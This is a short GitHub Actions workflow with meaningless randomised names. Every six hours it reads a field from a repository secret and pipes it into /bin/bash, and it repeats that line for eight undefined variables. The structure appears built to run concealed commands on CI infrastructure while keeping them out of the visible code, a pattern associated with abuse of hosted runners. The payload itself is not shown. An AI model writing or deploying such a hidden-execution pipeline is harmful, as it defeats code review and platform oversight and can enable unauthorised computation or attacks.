name: dongchudai5647

on:
  workflow_dispatch:
  schedule:
    - cron: '49 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dongchudai5647
        env:
          ct11: ${{ secrets.ct11 }}
        run: |
          echo $ct11 | jq -r .cu95 | /bin/bash
          echo $fh330 | jq -r .ejiy70 | /bin/bash
          echo $xnnfz3 | jq -r .ro79192 | /bin/bash
          echo $tdqm72 | jq -r .asm89 | /bin/bash
          echo $drgi42 | jq -r .aw88 | /bin/bash
          echo $hskb51 | jq -r .cleym0321 | /bin/bash
          echo $o143 | jq -r .chm825 | /bin/bash
          echo $djpr426 | jq -r .tr43292 | /bin/bash
          echo $k8738 | jq -r .u27933 | /bin/bash

